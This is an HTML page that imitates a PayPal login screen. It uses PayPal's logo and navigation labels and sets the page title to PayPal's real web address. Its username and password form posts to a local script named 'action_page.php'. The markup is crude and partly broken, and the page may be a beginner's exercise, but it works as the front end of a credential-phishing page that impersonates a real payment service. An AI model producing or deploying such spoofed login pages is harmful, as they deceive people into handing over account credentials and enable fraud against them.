<!DOCTYPE html>
<html>
    <head>
        <style>
            body {
  background-image: url(kuhle.jpg);
  background-size: cover;


}
            .topnav{
 display: inline-block;
  background-color: light gray;
  overflow: hidden; 
  width: 100%;
  height: 30px;
  font-size: 25px;
  word-break: normal;
}

.topnav a {
 
  align-content: center;
  color: black;
  text-align: center;
  padding: 25px 20px;
  text-decoration: none;
  font-size: 15px;
  text-transform: uppercase;
  font-weight: bold;
}


.topnav a:hover {
  background-color: whitesmoke;
  color: black;
}


.topnav a.active {
  background-color: #04AA6D;
  color: white;
}





form {
  border: 3px transparent;
 
}


input[type=text], input[type=password] {
  width: 37%;
  padding: 20px 20px;
  margin: 8px 0;
  display: inline-block;
  background-color:white;
  border: 0.5px transparent;
  box-sizing: border-box;
}
button {
  background-color:white;
  color:black;
  padding: 14px 20px;
  margin: 8px 0;
  font-size: 12px;
  border: none;
  cursor: pointer;
  width: 50%;
}


button:hover {
  opacity: 0.8;
}


.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: black;
}




img.paypal {
    align-content: center;
  width: 20%;
  border-radius: 50%;
}
.imgcontainer {
  text-align: center;
  margin: 28px 0 12px 0;
}


.container {
  padding: 10px;
  background-color:transparent;

}


span.psw {
  float: right;
  padding-top: 16px;
  background-color:transparent;

}


@media screen and (max-width: 300px) {
  span.psw {
    display: block;
    float: none;
   
  }
  .cancelbtn {
    width: 100%;
  }


}



            </style>



        <title>https://www.paypal.com/za/home</title>
    </head>
     
    <body>

       <center><div class="topnav" id="myTopnav">
            
            <a href="#personal">Personal</a>


            <a href="#business">Business</a>



            <a href="#partners and developers">Partners And Developers</a>
            
              
            </a>
          </div></center>
<div>
          <form action="action_page.php" method="post">
            <div class="imgcontainer">
              <img src="paypal.png" alt="paypal" class="paypal">
            </div>
          
            <div class="container">
              <label for="uname"><b>Username</b></label>
              <input type="text" placeholder="Enter Username" name="uname" required><br>
          
              <label for="psw"><b>Password</b></label>
              <input type="password" placeholder="Enter Password" name="psw" required><br>
          
              <button type="submit" placeholder="Submit" ><bolder>Login</bolder></button>
              
            </div>
          
            <div class="container" style="background-color: "white">
              <button type="button" class="cancelbtn">Cancel</button>
              <span class="forg">Forgot <a href="#">password?</a></span>
            </div>
          </form>


















    </body>













































</html>